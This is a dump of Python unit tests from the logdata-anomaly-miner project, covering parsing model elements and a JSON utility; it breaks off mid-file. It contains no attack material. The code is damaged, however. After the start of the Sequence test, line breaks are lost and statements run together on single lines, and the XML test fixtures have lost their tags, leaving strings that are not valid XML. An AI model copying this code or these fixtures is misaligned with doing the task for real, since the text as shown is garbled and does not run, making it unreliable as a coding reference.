    def test5min_repeat_input_validation(self):
        """Check if min_repeat is validated: non-int types (bool included) raise TypeError, a negative value raises ValueError."""
        fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data)
        for bad_value in ("string", None, b"path", True):
            self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=bad_value)
        self.assertRaises(ValueError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=-1)
        for bad_value in (123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=bad_value)

    def test6max_repeat_input_validation(self):
        """Check if max_repeat is validated: non-int types raise TypeError, zero and max_repeat < min_repeat raise ValueError."""
        fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data)
        for bad_value in ("string", None, b"path", True):
            self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=bad_value)
        self.assertRaises(ValueError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=0)
        # an upper bound below the lower bound is a value error, not a type error
        self.assertRaises(ValueError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=10, min_repeat=11)
        for bad_value in (123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=bad_value)

    def test7get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element."""
        model_element = RepeatedElementDataModelElement(self.id_, DummyFixedDataModelElement(self.fixed_id, self.fixed_data))
        data = b"fixed data"
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        for not_a_context in (MatchElement(None, data, None, None), data, data.decode(), 123, 123.22, True, None, [],
                              {"key": MatchContext(data)}, set(), (), model_element):
            self.assertRaises(AttributeError, model_element.get_match_element, self.path, not_a_context)


if __name__ == "__main__":
    unittest.main()


# logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/SequenceModelElementTest.py000066400000000000000000000133141500476301700307020ustar00rootroot00000000000000
import unittest
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement


class SequenceModelElementTest(TestBase):
    """Unittests for the SequenceModelElement."""

    id_ = "sequence"
    path = "path"
    # three fixed children that together match "string0 string1 string2"
    children = [DummyFixedDataModelElement("0", b"string0 "), DummyFixedDataModelElement("1", b"string1 "),
                DummyFixedDataModelElement("2", b"string2")]
    match_elements = [MatchElement("path/sequence/0", b"string0 ", b"string0 ", None),
                      MatchElement("path/sequence/1", b"string1 ", b"string1 ", None),
                      MatchElement("path/sequence/2", b"string2", b"string2", None)]

    def test1get_match_element_valid_match(self):
        """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters."""
        # (input line, expected consumed value); the second input carries trailing text that must stay unconsumed
        for data, value in ((b"string0 string1 string2", b"string0 string1 string2"),
                            (b"string0 string1 string2 other string follows", b"string0 string1 string2")):
            match_context = DummyMatchContext(data)
            sequence_me = SequenceModelElement(self.id_, self.children)
            match_element = sequence_me.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, self.match_elements)

    def test2get_match_element_no_match(self):
        """Parse not matching substring from MatchContext and check if the MatchContext was not changed."""
        # empty, truncated, wrong last child, wrong middle child
        for data in (b"", b"string0 string1 ", b"string0 string1 string3", b"string0 string0 string2"):
            match_context = DummyMatchContext(data)
            sequence_me = SequenceModelElement(self.id_, self.children)
            match_element = sequence_me.get_match_element(self.path, match_context)
            self.compare_no_match_results(data, match_element, match_context)

    def test3element_id_input_validation(self):
        """Check if element_id is validated: empty string raises ValueError, non-str types raise TypeError."""
        self.assertRaises(ValueError, SequenceModelElement, "", self.children)
        for bad_id in (None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, SequenceModelElement, bad_id, self.children)

    def test4get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element."""
        model_element = SequenceModelElement(self.id_, self.children)
        data = b"string0 string1 string2"
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, True)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, None)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, [])
        # further invalid match_context values follow
        self.assertRaises(AttributeError,
model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/VariableByteDataModelElementTest.py000066400000000000000000000130141500476301700322720ustar00rootroot00000000000000import unittest from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class VariableByteDataModelElementTest(TestBase): """Unittests for the VariableByteDataModelElement.""" id_ = "variable" path = "path" alphabet = b"abcdefghijklmnopqrstuvwxyz " def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"abcdefghijklm nopqrstuvwxyz.!?" value = b"abcdefghijklm nopqrstuvwxyz" match_context = DummyMatchContext(data) variable_byte_dme = VariableByteDataModelElement(self.id_, self.alphabet) match_element = variable_byte_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) variable_byte_dme = VariableByteDataModelElement(self.id_, self.alphabet) match_element = variable_byte_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"!abcdefghijklm nopqrstuvwxyz.!?" 
match_context = DummyMatchContext(data) variable_byte_dme = VariableByteDataModelElement(self.id_, self.alphabet) match_element = variable_byte_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, VariableByteDataModelElement, "", self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, None, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, b"path", self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, True, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, 123, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, 123.22, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, {"id": "path"}, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, ["path"], self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, [], self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, (), self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, set(), self.alphabet) def test4alphabet_input_validation(self): """Check if element_id is validated.""" self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, "string") self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, None) self.assertRaises(ValueError, VariableByteDataModelElement, self.id_, b"") self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, True) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, 123) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, 123.22) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, {"id": "path"}) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, ["path"]) self.assertRaises(TypeError, VariableByteDataModelElement, 
self.id_, []) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, ()) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, set()) def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = VariableByteDataModelElement(self.id_, self.alphabet) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/WhiteSpaceLimitedDataModelElementTest.py000066400000000000000000000153721500476301700332760ustar00rootroot00000000000000import unittest from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement from 
aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class WhiteSpaceLimitedDataModelElementTest(TestBase): """Unittests for the WhiteSpaceLimitedDataModelElement.""" id_ = "whitespace" path = "path" def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"space: ,tab:\t" value = b"space:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"tab:\t,space: " value = b"tab:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"This+is+a+string+without+any+whitespaces." match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, None) data = b"This is a string with whitespaces." 
value = b"This" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"space: ,tab:\t" value = b"space:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"tab:\t\t,space: " value = b"tab:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"spacetab: \t,tab:\t" value = b"spacetab:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"\ttab" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" space" match_context = DummyMatchContext(data) whitespace_dme 
= WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, WhiteSpaceLimitedDataModelElement, "") self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, None) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, b"path") self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, True) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, 123) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, 123.22) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, {"id": "path"}) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, ["path"]) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, []) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, ()) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, set()) def test4get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = WhiteSpaceLimitedDataModelElement(self.id_) data = b"space: ,tab:\t" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) 
self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/XmlModelElementTest.py000066400000000000000000000446101500476301700276750ustar00rootroot00000000000000import copy import unittest import defusedxml.ElementTree as xml import json from aminer.parsing.XmlModelElement import XmlModelElement, decode_xml from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement, DummyNumberModelElement class XmlModelElementTest(TestBase): """Unittests for the XmlModelElement.""" id_ = "xml" path = "path" single_line = b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I will notI will not" single_line_missing_element = b"JaniDon't forget me this weekend!Don't forget me this weekend!" single_line_invalid = b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I will notI will not" single_line_no_match = b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I will notI will not" single_line_non_optional_empty = b"ToveDon't forget me this weekend!Don't forget me this weekend!" 
\ b"JaniToveRe: I will notI will not" single_line_no_xml = b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I will notI will notddddddddddddddd" single_line_escaped = b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I\x20will\x20notI\x20will\x20not" single_line_xml_declaration = b"" \ b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I will notI will not" multi_line = b""" Tove Jani Don't forget me this weekend! Don't forget me this weekend! Jani Tove Re: test1 test2 """ key_parser_dict = {"messages": [{"note": { "+id": DummyNumberModelElement("id"), "_+opt": DummyFixedDataModelElement("opt", b"text"), "to": AnyByteDataModelElement("to"), "from": AnyByteDataModelElement("from"), "?heading": AnyByteDataModelElement("heading"), "body": { "text1": AnyByteDataModelElement("text1"), "text2": AnyByteDataModelElement("text2") } }}]} key_parser_dict_allow_all = {"messages": [{"note": { "+id": DummyNumberModelElement("id"), "_+opt": DummyFixedDataModelElement("opt", b"text"), "to": AnyByteDataModelElement("to"), "from": AnyByteDataModelElement("from"), "?heading": AnyByteDataModelElement("heading"), "body": "ALLOW_ALL" }}]} def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" xml_model_element = XmlModelElement(self.id_, self.key_parser_dict) data = self.single_line value = decode_xml(xml.fromstring(data)) match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) match_context.match_string = data self.compare_match_results( data, match_element, match_context, self.id_, self.path, data, value, match_element.children) data = self.multi_line value = decode_xml(xml.fromstring(data)) match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) 
match_context.match_string = data self.compare_match_results( data, match_element, match_context, self.id_, self.path, data, value, match_element.children) data = self.single_line_escaped value = decode_xml(xml.fromstring(data)) match_context = DummyMatchContext(self.single_line_escaped) match_element = xml_model_element.get_match_element(self.path, match_context) match_context.match_string = self.single_line self.compare_match_results( data, match_element, match_context, self.id_, self.path, self.single_line, value, match_element.children) data = self.single_line_xml_declaration value = decode_xml(xml.fromstring(data)) match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) match_context.match_string = self.single_line match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, self.single_line, value, match_element.children) xml_model_element = XmlModelElement(self.id_, self.key_parser_dict_allow_all) data = self.single_line value = decode_xml(xml.fromstring(data)) match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) match_context.match_string = data self.compare_match_results( data, match_element, match_context, self.id_, self.path, data, value, match_element.children) def test2get_match_element_with_umlaut(self): """Test if ä ö ü are used correctly.""" key_parser_dict = {"messages": [{"note": {"works": DummyFixedDataModelElement("abc", "a ä ü ö z".encode("utf-8"))}}]} data = "a ä ü ö z".encode("utf-8") xml_model_element = XmlModelElement(self.id_, key_parser_dict) value = decode_xml(xml.fromstring(data)) match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) match_context.match_string = data match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( 
data, match_element, match_context, self.id_, self.path, data, value, match_element.children) def test3get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" xml_model_element = XmlModelElement(self.id_, self.key_parser_dict) # missing element data = self.single_line_missing_element match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # invalid xml data = self.single_line_invalid match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # child not matching data = self.single_line_no_match match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # non-optional empty data = self.single_line_non_optional_empty match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # no xml data = self.single_line_no_xml match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test4element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, XmlModelElement, "", self.key_parser_dict) # empty element_id self.assertRaises(TypeError, XmlModelElement, None, self.key_parser_dict) # None element_id self.assertRaises(TypeError, XmlModelElement, b"path", self.key_parser_dict) # bytes element_id is not allowed self.assertRaises(TypeError, XmlModelElement, True, self.key_parser_dict) # boolean element_id is not allowed 
self.assertRaises(TypeError, XmlModelElement, 123, self.key_parser_dict) # integer element_id is not allowed self.assertRaises(TypeError, XmlModelElement, 123.22, self.key_parser_dict) # float element_id is not allowed self.assertRaises(TypeError, XmlModelElement, {"id": "path"}, self.key_parser_dict) # dict element_id is not allowed self.assertRaises(TypeError, XmlModelElement, ["path"], self.key_parser_dict) # list element_id is not allowed self.assertRaises(TypeError, XmlModelElement, [], self.key_parser_dict) # empty list element_id is not allowed self.assertRaises(TypeError, XmlModelElement, (), self.key_parser_dict) # empty tuple element_id is not allowed self.assertRaises(TypeError, XmlModelElement, set(), self.key_parser_dict) # empty set element_id is not allowed def test5key_parser_dict_input_validation(self): """Check if key_parser_dict is validated.""" self.assertRaises(TypeError, XmlModelElement, self.id_, "path") # string key_parser_dict self.assertRaises(TypeError, XmlModelElement, self.id_, None) # None key_parser_dict self.assertRaises(TypeError, XmlModelElement, self.id_, b"path") # bytes key_parser_dict is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, True) # boolean key_parser_dict is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, 123) # integer key_parser_dict is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, 123.22) # float key_parser_dict is not allowed # dict key_parser_dict with no ModelElementInterface values is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, {"id": "path"}) # dict key_parser_dict with list of other lengths than 1 is not allowed. 
key_parser_dict = copy.deepcopy(self.key_parser_dict) key_parser_dict["messages"] = [] self.assertRaises(ValueError, XmlModelElement, self.id_, key_parser_dict) self.assertRaises(TypeError, XmlModelElement, self.id_, ["path"]) # list key_parser_dict is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, []) # empty list key_parser_dict is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, ()) # empty tuple key_parser_dict is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, set()) # empty set key_parser_dict is not allowed def test6attribute_prefix_input_validation(self): """Check if attribute_prefix is validated.""" self.assertRaises(ValueError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix="") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=None) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=b"path") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=True) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=123) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=123.22) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix={"id": "path"}) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=["path"]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=[]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=()) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=set()) def test7optional_attribute_prefix_input_validation(self): """Check if optional_attribute_prefix is validated.""" self.assertRaises(ValueError, XmlModelElement, self.id_, self.key_parser_dict, 
optional_attribute_prefix="") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=None) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=b"path") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=True) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=123) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=123.22) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix={"id": "path"}) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=["path"]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=[]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=()) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=set()) def test8empty_allowed_prefix_input_validation(self): """Check if empty_allowed_prefix is validated.""" self.assertRaises(ValueError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix="") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=None) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=b"path") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=True) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=123) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=123.22) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix={"id": "path"}) 
self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=["path"]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=[]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=()) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=set()) def test9xml_header_expected_input_validation(self): """Check if xml_header_expected is validated.""" self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected="") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=None) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=b"path") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=123) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=123.22) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected={"id": "path"}) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=["path"]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=[]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=()) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=set()) def test10compare_prefixes(self): """Check if all prefixes are validated against each other.""" self.assertRaises(ValueError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix="$", optional_attribute_prefix="$") self.assertRaises(ValueError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix="$", empty_allowed_prefix="$") self.assertRaises(ValueError, XmlModelElement, self.id_, 
self.key_parser_dict, empty_allowed_prefix="$", optional_attribute_prefix="$") if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/__init__.py000066400000000000000000000000001500476301700255220ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/000077500000000000000000000000001500476301700227355ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/JsonUtilTest.py000066400000000000000000000061701500476301700257220ustar00rootroot00000000000000import unittest from aminer.util.JsonUtil import encode_object, decode_object, dump_as_json, load_json from unit.TestBase import TestBase class JsonUtilTest(TestBase): """Unittests for the JsonUtil class.""" def test1encode_decode(self): """This test method encodes/decodes objects into/from the JSON-format.""" # strings s = 'this is a normal string to be serialized' pre = 'string:' enc = encode_object(s) self.assertEqual(enc, pre + s) self.assertEqual(decode_object(enc), s) # bytes s = b'this is a bytestring to be serialized' pre = b'bytes:' enc = encode_object(s) self.assertEqual(enc, pre.decode() + s.decode()) self.assertEqual(decode_object(s), s) self.assertEqual(decode_object(enc), s) s = bytes.fromhex('001B') enc = encode_object(s) self.assertEqual(enc, pre.decode() + '%00%1b') self.assertEqual(decode_object(enc), s) # iterables lis = [b'1', '2', 3, ['4'], {'5', '6'}, {'key': 'val', tuple([1,"2",None]): 'otherVal'}] res = ['bytes:1', 'string:2', 3, ['string:4'], ['string:' + x for x in lis[4]], {'string:key': 'string:val', "tuple:(1, '2', None)": 'string:otherVal'}] enc = encode_object(lis) self.assertEqual(enc, res) lis[4] = list(lis[4]) self.assertEqual(decode_object(enc), lis) tup = (b'1', '2', 3, ['4'], {'5', '6'}, {'key': 'val', tuple([1,"2",None]): 'otherVal'}) enc = encode_object(tup) self.assertEqual(enc, res) self.assertEqual(decode_object(enc), lis) dictionary = {'user': 'defaultUser', 'password': 
b'topSecret', 'id': 25} enc = encode_object(dictionary) self.assertEqual(enc, {'string:user': 'string:defaultUser', 'string:password': 'bytes:topSecret', 'string:id': 25}) self.assertEqual(decode_object(enc), dictionary) # booleans boolean1 = True enc = encode_object(boolean1) self.assertEqual(enc, True) self.assertEqual(decode_object(enc), True) # integers integer1 = 125 enc = encode_object(integer1) self.assertEqual(enc, 125) self.assertEqual(decode_object(enc), 125) # floats float1 = 125.25 enc = encode_object(float1) self.assertEqual(enc, 125.25) self.assertEqual(decode_object(enc), 125.25) def test2dump_load_json(self): """ This test method serializes an object by encoding it into a JSON-formatted string. Annotation: external classes and methods are not tested and assumed to be working as intend. """ tup = (b'1', '2', 3, ['4']) enc = '["bytes:1", "string:2", 3, ["string:4"]]' self.assertEqual(dump_as_json(tup), enc) self.assertEqual(load_json(enc), list(tup)) def test3load_json(self): """ This test method loads a serialized string and deserializes it by decoding into an object. Annotation: external classes and methods are not tested and assumed to be working as intend. 
